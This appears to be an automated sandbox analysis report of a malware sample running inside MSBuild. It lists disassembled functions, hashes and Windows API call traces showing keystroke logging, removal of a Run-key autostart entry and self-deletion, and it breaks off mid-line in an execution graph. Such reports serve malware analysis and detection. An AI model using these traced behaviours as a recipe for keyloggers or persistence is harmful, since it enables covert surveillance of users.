                                                                                                                                                                                    • String ID: IsValidLocaleName$j=D
                                                                                                                                                                                    • API String ID: 1901932003-3128777819
                                                                                                                                                                                    • Opcode ID: 34048a5779238571e042b1bd9c847fb843bb8be3ea41a6d98ed8d0d1ded4c140
                                                                                                                                                                                    • Instruction ID: d075984350fdfa8650c9f53b231b8a0b142c4dacf6ed37e79753978632a381d4
                                                                                                                                                                                    • Opcode Fuzzy Hash: 34048a5779238571e042b1bd9c847fb843bb8be3ea41a6d98ed8d0d1ded4c140
                                                                                                                                                                                    • Instruction Fuzzy Hash: B7F0E930A45218F7EA116B61DC06F5EBB54CF49B11F50407AFD056A293CB796D0195DC
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.4116922521.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: H_prolog
                                                                                                                                                                                    • String ID: T=G$T=G
                                                                                                                                                                                    • API String ID: 3519838083-3732185208
                                                                                                                                                                                    • Opcode ID: ece060f59eec47038b163f6730b9b4774a9df75ced3df6c836fae2af045d366e
                                                                                                                                                                                    • Instruction ID: 37a3980bbf64332544f5ef03d086655580814226aad47650f393c0c18fea351b
                                                                                                                                                                                    • Opcode Fuzzy Hash: ece060f59eec47038b163f6730b9b4774a9df75ced3df6c836fae2af045d366e
                                                                                                                                                                                    • Instruction Fuzzy Hash: BCF0E971A00220ABC714BB65C80669EB774EF41369F10827FB416B72E1CBBD5D04D65D
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetKeyState.USER32(00000011), ref: 0040AD5B
                                                                                                                                                                                      • Part of subcall function 00409B10: GetForegroundWindow.USER32(?,?,004740F8), ref: 00409B3F
                                                                                                                                                                                      • Part of subcall function 00409B10: GetWindowThreadProcessId.USER32(00000000,?), ref: 00409B4B
                                                                                                                                                                                      • Part of subcall function 00409B10: GetKeyboardLayout.USER32(00000000), ref: 00409B52
                                                                                                                                                                                      • Part of subcall function 00409B10: GetKeyState.USER32(00000010), ref: 00409B5C
                                                                                                                                                                                      • Part of subcall function 00409B10: GetKeyboardState.USER32(?,?,004740F8), ref: 00409B67
                                                                                                                                                                                      • Part of subcall function 00409B10: ToUnicodeEx.USER32(0047414C,00000000,?,?,00000010,00000000,00000000), ref: 00409B8A
                                                                                                                                                                                      • Part of subcall function 00409B10: ToUnicodeEx.USER32(?,?,00000010,00000000,00000000), ref: 00409BE3
                                                                                                                                                                                      • Part of subcall function 00409D58: SetEvent.KERNEL32(?,?,?,0040AF3F,?,?,?,?,?,00000000), ref: 00409D84
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.4116922521.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: State$KeyboardUnicodeWindow$EventForegroundLayoutProcessThread
                                                                                                                                                                                    • String ID: [AltL]$[AltR]
                                                                                                                                                                                    • API String ID: 2738857842-2658077756
                                                                                                                                                                                    • Opcode ID: 80506e14bf35cdfd57388ac48183fdf9bd6fb207497dbc1ccda1b4521432daf8
                                                                                                                                                                                    • Instruction ID: d2c0c429c9fe13b3c6c970781ecfc4970ab7400740a1dec538c1fc9fef0a0b20
                                                                                                                                                                                    • Opcode Fuzzy Hash: 80506e14bf35cdfd57388ac48183fdf9bd6fb207497dbc1ccda1b4521432daf8
                                                                                                                                                                                    • Instruction Fuzzy Hash: 47E0652134072117C898323EA91E6EE3A228F82B65B80416FF8866BAD6DD6D4D5053CB
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • _free.LIBCMT ref: 00448825
                                                                                                                                                                                      • Part of subcall function 00446AC5: RtlFreeHeap.NTDLL(00000000,00000000,?,0044FA50,0000000A,00000000,0000000A,00000000,?,0044FCF4,0000000A,00000007,0000000A,?,00450205,0000000A), ref: 00446ADB
                                                                                                                                                                                      • Part of subcall function 00446AC5: GetLastError.KERNEL32(0000000A,?,0044FA50,0000000A,00000000,0000000A,00000000,?,0044FCF4,0000000A,00000007,0000000A,?,00450205,0000000A,0000000A), ref: 00446AED
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.4116922521.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ErrorFreeHeapLast_free
                                                                                                                                                                                    • String ID: `@$`@
                                                                                                                                                                                    • API String ID: 1353095263-20545824
                                                                                                                                                                                    • Opcode ID: 9a963da6b0d453c70d37714207bd95daf40472698ea915a46c6a843fe12f4396
                                                                                                                                                                                    • Instruction ID: 46705ffcfacdd7a720b29fb61e5cb4af2d59a6418439a2947ca99394172970e0
                                                                                                                                                                                    • Opcode Fuzzy Hash: 9a963da6b0d453c70d37714207bd95daf40472698ea915a46c6a843fe12f4396
                                                                                                                                                                                    • Instruction Fuzzy Hash: B9E06D761006059F8720DE6DD400A86B7E4EF95360320852AE89DE3310DB32E812CB40
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetKeyState.USER32(00000012), ref: 0040ADB5
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.4116922521.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: State
                                                                                                                                                                                    • String ID: [CtrlL]$[CtrlR]
                                                                                                                                                                                    • API String ID: 1649606143-2446555240
                                                                                                                                                                                    • Opcode ID: d3bfbbd6b4e89cd63980a9ff1b49381952101389b4aa81d5fd12017d0c3b90ad
                                                                                                                                                                                    • Instruction ID: 615b7dbe40c0b8188db9493e0f2b19f017fb36a74fa458c508a435569d7d4a1e
                                                                                                                                                                                    • Opcode Fuzzy Hash: d3bfbbd6b4e89cd63980a9ff1b49381952101389b4aa81d5fd12017d0c3b90ad
                                                                                                                                                                                    • Instruction Fuzzy Hash: 71E0862170071117C514353DD61A67F39228F41776F80013FF882ABAC6E96D8D6023CB
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,00000000,00000002,?,80000002,80000002,0040BFB2,00000000,004742E0,004742F8,?,pth_unenc), ref: 00412988
                                                                                                                                                                                    • RegDeleteValueW.ADVAPI32(?,?,?,pth_unenc), ref: 00412998
                                                                                                                                                                                    Strings
                                                                                                                                                                                    • Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 00412986
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.4116922521.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: DeleteOpenValue
                                                                                                                                                                                    • String ID: Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\
                                                                                                                                                                                    • API String ID: 2654517830-1051519024
                                                                                                                                                                                    • Opcode ID: 37dabd9028f0cede140cc98497e4e15f557d68d096268be44a89a64eb946223e
                                                                                                                                                                                    • Instruction ID: 4813e9247c8a4fa7715124fbb4df20ddc3d96ddce1d5e270e7c0f337b45b5704
                                                                                                                                                                                    • Opcode Fuzzy Hash: 37dabd9028f0cede140cc98497e4e15f557d68d096268be44a89a64eb946223e
                                                                                                                                                                                    • Instruction Fuzzy Hash: 0AE01270310304BFEF104F61ED06FDB37ACBB80B89F004165F505E5191E2B5DD54A658
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • DeleteFileW.KERNEL32(00000000,?,pth_unenc), ref: 0040AF84
                                                                                                                                                                                    • RemoveDirectoryW.KERNEL32(00000000,?,pth_unenc), ref: 0040AFAF
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.4116922521.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: DeleteDirectoryFileRemove
                                                                                                                                                                                    • String ID: pth_unenc
                                                                                                                                                                                    • API String ID: 3325800564-4028850238
                                                                                                                                                                                    • Opcode ID: b246b6ffa53a22d2799d5431088e9539915b729032b3d26a74de246411d0112c
                                                                                                                                                                                    • Instruction ID: b68931c7331ddc333ece9e06749e281aefc344294653c9eba2f2de372e339d66
                                                                                                                                                                                    • Opcode Fuzzy Hash: b246b6ffa53a22d2799d5431088e9539915b729032b3d26a74de246411d0112c
                                                                                                                                                                                    • Instruction Fuzzy Hash: FEE046715112108BC610AB31EC44AEBB398AB05316F00487FF8D3A36A1DE38A988CA98
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • TerminateProcess.KERNEL32(00000000,pth_unenc,0040E670), ref: 004116A9
                                                                                                                                                                                    • WaitForSingleObject.KERNEL32(000000FF), ref: 004116BC
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.4116922521.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ObjectProcessSingleTerminateWait
                                                                                                                                                                                    • String ID: pth_unenc
                                                                                                                                                                                    • API String ID: 1872346434-4028850238
                                                                                                                                                                                    • Opcode ID: 0bcc8583bbfeaf574487765c88b71504591df5916e82e2463f0204abfb9b1fb3
                                                                                                                                                                                    • Instruction ID: 4302d9c34f7b4dbdac7fc8682473a51625df35810590c52ad239c14707b44b4b
                                                                                                                                                                                    • Opcode Fuzzy Hash: 0bcc8583bbfeaf574487765c88b71504591df5916e82e2463f0204abfb9b1fb3
                                                                                                                                                                                    • Instruction Fuzzy Hash: C1D0C938559211AFD7614B68BC08B453B6AA745222F108277F828413F1C72598A4AE1C
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00401AD8), ref: 0043FAF4
                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 0043FB02
                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0043FB5D
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.4116922521.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ByteCharMultiWide$ErrorLast
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1717984340-0
                                                                                                                                                                                    • Opcode ID: a3a9a9c7793c2081db5377885f607edf127f94d6c053b0090e31d102b176707d
                                                                                                                                                                                    • Instruction ID: ecac45699e256c48587d6f27f66036641a8fb520bb473c9b2adecd150689d728
                                                                                                                                                                                    • Opcode Fuzzy Hash: a3a9a9c7793c2081db5377885f607edf127f94d6c053b0090e31d102b176707d
                                                                                                                                                                                    • Instruction Fuzzy Hash: 65414871E00206AFCF258F65C854ABBFBA4EF09310F1451BAF858973A1DB38AD09C759

                                                                                                                                                                                    Execution Graph

                                                                                                                                                                                    Execution Coverage:6.3%
                                                                                                                                                                                    Dynamic/Decrypted Code Coverage:9.2%
                                                                                                                                                                                    Signature Coverage:0.8%
                                                                                                                                                                                    Total number of Nodes:2000
                                                                                                                                                                                    Total number of Limit Nodes:60
                                                                                                                                                                                    execution_graph 40525 441819 40528 430737 40525->40528 40527 441825 40529 430756 40528->40529 40530 43076d 40528->40530 40531 430774 40529->40531 40532 43075f 40529->40532 40530->40527 40543 43034a memcpy 40531->40543 40542 4169a7 11 API calls 40532->40542 40535 4307ce 40536 430819 memset 40535->40536 40544 415b2c 11 API calls 40535->40544 40536->40530 40537 43077e 40537->40530 40537->40535 40540 4307fa 40537->40540 40539 4307e9 40539->40530 40539->40536 40545 4169a7 11 API calls 40540->40545 40542->40530 40543->40537 40544->40539 40545->40530 37539 442ec6 19 API calls 37713 4152c6 malloc 37714 4152e2 37713->37714 37715 4152ef 37713->37715 37717 416760 11 API calls 37715->37717 37717->37714 38294 4466f4 38313 446904 38294->38313 38296 446700 GetModuleHandleA 38299 446710 __set_app_type __p__fmode __p__commode 38296->38299 38298 4467a4 38300 4467ac __setusermatherr 38298->38300 38301 4467b8 38298->38301 38299->38298 38300->38301 38314 4468f0 _controlfp 38301->38314 38303 4467bd _initterm __wgetmainargs _initterm 38304 446810 38303->38304 38305 44681e GetStartupInfoW 38303->38305 38307 446866 GetModuleHandleA 38305->38307 38315 41276d 38307->38315 38311 446896 exit 38312 44689d _cexit 38311->38312 38312->38304 38313->38296 38314->38303 38316 41277d 38315->38316 38358 4044a4 LoadLibraryW 38316->38358 38318 412785 38319 412789 38318->38319 38366 414b81 38318->38366 38319->38311 38319->38312 38322 4127c8 38372 412465 memset ??2@YAPAXI 38322->38372 38324 4127ea 38384 40ac21 38324->38384 38329 412813 38402 40dd07 memset 38329->38402 38330 412827 38407 40db69 memset 38330->38407 38333 412822 38428 4125b6 ??3@YAXPAX 38333->38428 38335 40ada2 _wcsicmp 38336 41283d 38335->38336 38336->38333 38339 412863 CoInitialize 38336->38339 38412 41268e 38336->38412 38432 4123e2 GetModuleHandleW RegisterClassW GetModuleHandleW CreateWindowExW 38339->38432 38341 41296f 38434 40b633 38341->38434 38346 412873 ShowWindow UpdateWindow GetModuleHandleW LoadAcceleratorsW GetMessageW 38350 412957 CoUninitialize 38346->38350 38355 4128ca 38346->38355 38350->38333 38351 4128d0 TranslateAcceleratorW 38352 412941 GetMessageW 38351->38352 38351->38355 38352->38350 38352->38351 38353 412909 IsDialogMessageW 38353->38352 38353->38355 38354 4128fd IsDialogMessageW 38354->38352 38354->38353 38355->38351 38355->38353 38355->38354 38356 41292b TranslateMessage DispatchMessageW 38355->38356 38357 41291f IsDialogMessageW 38355->38357 38356->38352 38357->38352 38357->38356 38359 4044f7 38358->38359 38360 4044cf GetProcAddress 38358->38360 38364 404507 MessageBoxW 38359->38364 38365 40451e 38359->38365 38361 4044e8 FreeLibrary 38360->38361 38362 4044df 38360->38362 38361->38359 38363 4044f3 38361->38363 38362->38361 38363->38359 38364->38318 38365->38318 38367 414b8a 38366->38367 38368 412794 SetErrorMode GetModuleHandleW EnumResourceTypesW 38366->38368 38438 40a804 memset 38367->38438 38368->38322 38371 414b9e GetProcAddress 38371->38368 38373 4124e0 38372->38373 38374 412505 ??2@YAPAXI 38373->38374 38375 41251c 38374->38375 38377 412521 38374->38377 38460 40e820 memset ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI 38375->38460 38449 444722 38377->38449 38383 41259b wcscpy 38383->38324 38465 40b1ab free free 38384->38465 38386 40ac5c 38389 40a9ce malloc memcpy free free 38386->38389 38390 40ad4b 38386->38390 38392 40ace7 free 38386->38392 38397 40ad76 38386->38397 38469 40a8d0 38386->38469 38481 4099f4 38386->38481 38389->38386 38390->38397 38489 40a9ce 38390->38489 38392->38386 38396 40a8d0 7 API calls 38396->38397 38466 40aa04 38397->38466 38398 40ada2 38399 40adc9 38398->38399 38401 40adaa 38398->38401 38399->38329 38399->38330 38400 40adb3 _wcsicmp 38400->38399 38400->38401 38401->38399 38401->38400 38494 40dce0 38402->38494 38404 40dd3a GetModuleHandleW 38499 40dba7 38404->38499 38408 40dce0 3 API calls 38407->38408 38409 40db99 38408->38409 38571 40dae1 38409->38571 38585 402f3a 38412->38585 38414 412766 38414->38333 38414->38339 38415 4126d3 _wcsicmp 38416 4126a8 38415->38416 38416->38414 38416->38415 38418 41270a 38416->38418 38619 4125f8 7 API calls 38416->38619 38418->38414 38588 411ac5 38418->38588 38429 4125da 38428->38429 38430 4125f0 38429->38430 38431 4125e6 DeleteObject 38429->38431 38433 40b1ab free free 38430->38433 38431->38430 38432->38346 38433->38341 38435 40b640 38434->38435 38436 40b639 free 38434->38436 38437 40b1ab free free 38435->38437 38436->38435 38437->38319 38439 40a83b GetSystemDirectoryW 38438->38439 38440 40a84c wcscpy 38438->38440 38439->38440 38445 409719 wcslen 38440->38445 38443 40a881 LoadLibraryW 38444 40a886 38443->38444 38444->38368 38444->38371 38446 409724 38445->38446 38447 409739 wcscat LoadLibraryW 38445->38447 38446->38447 38448 40972c wcscat 38446->38448 38447->38443 38447->38444 38448->38447 38450 444732 38449->38450 38451 444728 DeleteObject 38449->38451 38461 409cc3 38450->38461 38451->38450 38453 412551 38454 4010f9 38453->38454 38455 401130 38454->38455 38456 401134 GetModuleHandleW LoadIconW 38455->38456 38457 401107 wcsncat 38455->38457 38458 40a7be 38456->38458 38457->38455 38459 40a7d2 38458->38459 38459->38383 38459->38459 38460->38377 38464 409bfd memset wcscpy 38461->38464 38463 409cdb CreateFontIndirectW 38463->38453 38464->38463 38465->38386 38467 40aa14 38466->38467 38468 40aa0a free 38466->38468 38467->38398 38468->38467 38470 40a8eb 38469->38470 38471 40a8df wcslen 38469->38471 38472 40a906 free 38470->38472 38473 40a90f 38470->38473 38471->38470 38474 40a919 38472->38474 38475 4099f4 3 API calls 38473->38475 38476 40a932 38474->38476 38477 40a929 free 38474->38477 38475->38474 38478 4099f4 3 API calls 38476->38478 38479 40a93e memcpy 38477->38479 38480 40a93d 38478->38480 38479->38386 38480->38479 38482 409a41 38481->38482 38483 4099fb malloc 38481->38483 38482->38386 38485 409a37 38483->38485 38486 409a1c 38483->38486 38485->38386 38487 409a30 free 38486->38487 38488 409a20 memcpy 38486->38488 38487->38485 38488->38487 38490 40a9e7 38489->38490 38491 40a9dc free 38489->38491 38493 4099f4 3 API calls 38490->38493 38492 40a9f2 38491->38492 38492->38396 38493->38492 38518 409bca GetModuleFileNameW 38494->38518 38496 40dce6 wcsrchr 38497 40dcf5 38496->38497 38498 40dcf9 wcscat 38496->38498 38497->38498 38498->38404 38519 44db70 38499->38519 38503 40dbfd 38522 4447d9 38503->38522 38506 40dc34 wcscpy wcscpy 38548 40d6f5 38506->38548 38507 40dc1f wcscpy 38507->38506 38510 40d6f5 3 API calls 38511 40dc73 38510->38511 38512 40d6f5 3 API calls 38511->38512 38513 40dc89 38512->38513 38514 40d6f5 3 API calls 38513->38514 38515 40dc9c EnumResourceNamesW EnumResourceNamesW wcscpy 38514->38515 38554 40da80 38515->38554 38518->38496 38520 40dbb4 memset memset 38519->38520 38521 409bca GetModuleFileNameW 38520->38521 38521->38503 38524 4447f4 38522->38524 38523 40dc1b 38523->38506 38523->38507 38524->38523 38525 444807 ??2@YAPAXI 38524->38525 38526 44481f 38525->38526 38527 444873 _snwprintf 38526->38527 38528 4448ab wcscpy 38526->38528 38561 44474a 8 API calls 38527->38561 38530 4448bb 38528->38530 38562 44474a 8 API calls 38530->38562 38532 4448a7 38532->38528 38532->38530 38533 4448cd 38563 44474a 8 API calls 38533->38563 38535 4448e2 38564 44474a 8 API calls 38535->38564 38537 4448f7 38565 44474a 8 API calls 38537->38565 38539 44490c 38566 44474a 8 API calls 38539->38566 38541 444921 38567 44474a 8 API calls 38541->38567 38543 444936 38568 44474a 8 API calls 38543->38568 38545 44494b 38569 44474a 8 API calls 38545->38569 38547 444960 ??3@YAXPAX 38547->38523 38549 44db70 38548->38549 38550 40d702 memset GetPrivateProfileStringW 38549->38550 38551 40d752 38550->38551 38552 40d75c WritePrivateProfileStringW 38550->38552 38551->38552 38553 40d758 38551->38553 38552->38553 38553->38510 38555 44db70 38554->38555 38556 40da8d memset 38555->38556 38557 40daac LoadStringW 38556->38557 38558 40dac6 38557->38558 38558->38557 38560 40dade 38558->38560 38570 40d76e memset GetPrivateProfileStringW WritePrivateProfileStringW memset _itow 38558->38570 38560->38333 38561->38532 38562->38533 38563->38535 38564->38537 38565->38539 38566->38541 38567->38543 38568->38545 38569->38547 38570->38558 38581 409b98 GetFileAttributesW 38571->38581 38573 40daea 38574 40db63 38573->38574 38575 40daef wcscpy wcscpy GetPrivateProfileIntW 38573->38575 38574->38335 38582 40d65d GetPrivateProfileStringW 38575->38582 38577 40db3e 38583 40d65d GetPrivateProfileStringW 38577->38583 38579 40db4f 38584 40d65d GetPrivateProfileStringW 38579->38584 38581->38573 38582->38577 38583->38579 38584->38574 38620 40eaff 38585->38620 38589 411ae2 memset 38588->38589 38590 411b8f 38588->38590 38660 409bca GetModuleFileNameW 38589->38660 38602 411a8b 38590->38602 38592 411b0a wcsrchr 38593 411b22 wcscat 38592->38593 38594 411b1f 38592->38594 38661 414770 wcscpy wcscpy wcscpy CreateFileW CloseHandle 38593->38661 38594->38593 38596 411b67 38662 402afb 38596->38662 38600 411b7f 38718 40ea13 SendMessageW memset SendMessageW 38600->38718 38603 402afb 27 API calls 38602->38603 38604 411ac0 38603->38604 38605 4110dc 38604->38605 38606 41113e 38605->38606 38611 4110f0 38605->38611 38743 40969c LoadCursorW SetCursor 38606->38743 38608 411143 38744 4032b4 38608->38744 38762 444a54 38608->38762 38609 4110f7 _wcsicmp 38609->38611 38610 411157 38612 40ada2 _wcsicmp 38610->38612 38611->38606 38611->38609 38765 410c46 10 API calls 38611->38765 38615 411167 38612->38615 38613 4111af 38615->38613 38616 4111a6 qsort 38615->38616 38616->38613 38619->38416 38621 40eb10 38620->38621 38633 40e8e0 38621->38633 38624 40eb6c memcpy memcpy 38628 40ebb7 38624->38628 38625 40ebf2 ??2@YAPAXI ??2@YAPAXI 38627 40ec2e ??2@YAPAXI 38625->38627 38630 40ec65 38625->38630 38626 40d134 16 API calls 38626->38628 38627->38630 38628->38624 38628->38625 38628->38626 38630->38630 38643 40ea7f 38630->38643 38632 402f49 38632->38416 38634 40e8f2 38633->38634 38635 40e8eb ??3@YAXPAX 38633->38635 38636 40e900 38634->38636 38637 40e8f9 ??3@YAXPAX 38634->38637 38635->38634 38638 40e911 38636->38638 38639 40e90a ??3@YAXPAX 38636->38639 38637->38636 38640 40e931 ??2@YAPAXI ??2@YAPAXI 38638->38640 38641 40e921 ??3@YAXPAX 38638->38641 38642 40e92a ??3@YAXPAX 38638->38642 38639->38638 38640->38624 38641->38642 38642->38640 38644 40aa04 free 38643->38644 38645 40ea88 38644->38645 38646 40aa04 free 38645->38646 38647 40ea90 38646->38647 38648 40aa04 free 38647->38648 38649 40ea98 38648->38649 38650 40aa04 free 38649->38650 38651 40eaa0 38650->38651 38652 40a9ce 4 API calls 38651->38652 38653 40eab3 38652->38653 38654 40a9ce 4 API calls 38653->38654 38655 40eabd 38654->38655 38656 40a9ce 4 API calls 38655->38656 38657 40eac7 38656->38657 38658 40a9ce 4 API calls 38657->38658 38659 40ead1 38658->38659 38659->38632 38660->38592 38661->38596 38719 40b2cc 38662->38719 38664 402b0a 38665 40b2cc 27 API calls 38664->38665 38666 402b23 38665->38666 38667 40b2cc 27 API calls 38666->38667 38668 402b3a 38667->38668 38669 40b2cc 27 API calls 38668->38669 38670 402b54 38669->38670 38671 40b2cc 27 API calls 38670->38671 38672 402b6b 38671->38672 38673 40b2cc 27 API calls 38672->38673 38674 402b82 38673->38674 38675 40b2cc 27 API calls 38674->38675 38676 402b99 38675->38676 38677 40b2cc 27 API calls 38676->38677 38678 402bb0 38677->38678 38679 40b2cc 27 API calls 38678->38679 38680 402bc7 38679->38680 38681 40b2cc 27 API calls 38680->38681 38682 402bde 38681->38682 38683 40b2cc 27 API calls 38682->38683 38684 402bf5 38683->38684 38685 40b2cc 27 API calls 38684->38685 38686 402c0c 38685->38686 38687 40b2cc 27 API calls 38686->38687 38688 402c23 38687->38688 38689 40b2cc 27 API calls 38688->38689 38690 402c3a 38689->38690 38691 40b2cc 27 API calls 38690->38691 38692 402c51 38691->38692 38693 40b2cc 27 API calls 38692->38693 38694 402c68 38693->38694 38695 40b2cc 27 API calls 38694->38695 38696 402c7f 38695->38696 38697 40b2cc 27 API calls 38696->38697 38698 402c99 38697->38698 38699 40b2cc 27 API calls 38698->38699 38700 402cb3 38699->38700 38701 40b2cc 27 API calls 38700->38701 38702 402cd5 38701->38702 38703 40b2cc 27 API calls 38702->38703 38704 402cf0 38703->38704 38705 40b2cc 27 API calls 38704->38705 38706 402d0b 38705->38706 38707 40b2cc 27 API calls 38706->38707 38708 402d26 38707->38708 38709 40b2cc 27 API calls 38708->38709 38710 402d3e 38709->38710 38711 40b2cc 27 API calls 38710->38711 38712 402d59 38711->38712 38713 40b2cc 27 API calls 38712->38713 38714 402d78 38713->38714 38715 40b2cc 27 API calls 38714->38715 38716 402d93 38715->38716 38717 4018db GetWindowPlacement memset GetSystemMetrics GetSystemMetrics SetWindowPlacement 38716->38717 38717->38600 38718->38590 38722 40b58d 38719->38722 38721 40b2d1 38721->38664 38723 40b5a4 GetModuleHandleW FindResourceW 38722->38723 38724 40b62e 38722->38724 38725 40b5c2 LoadResource 38723->38725 38727 40b5e7 38723->38727 38724->38721 38726 40b5d0 SizeofResource LockResource 38725->38726 38725->38727 38726->38727 38727->38724 38735 40afcf 38727->38735 38729 40b608 memcpy 38738 40b4d3 memcpy 38729->38738 38731 40b61e 38739 40b3c1 18 API calls 38731->38739 38733 40b626 38740 40b04b 38733->38740 38736 40b04b ??3@YAXPAX 38735->38736 38737 40afd7 ??2@YAPAXI 38736->38737 38737->38729 38738->38731 38739->38733 38741 40b051 ??3@YAXPAX 38740->38741 38742 40b05f 38740->38742 38741->38742 38742->38724 38743->38608 38745 4032c4 38744->38745 38746 40b633 free 38745->38746 38747 403316 38746->38747 38766 44553b 38747->38766 38751 403480 38964 40368c 15 API calls 38751->38964 38753 403489 38754 40b633 free 38753->38754 38755 403495 38754->38755 38755->38610 38756 4033a9 memset memcpy 38757 4033ec wcscmp 38756->38757 38758 40333c 38756->38758 38757->38758 38758->38751 38758->38756 38758->38757 38962 4028e7 11 API calls 38758->38962 38963 40f508 6 API calls 38758->38963 38760 403421 _wcsicmp 38760->38758 38763 444a64 FreeLibrary 38762->38763 38764 444a83 38762->38764 38763->38764 38764->38610 38765->38611 38767 445548 38766->38767 38768 445599 38767->38768 38965 40c768 38767->38965 38769 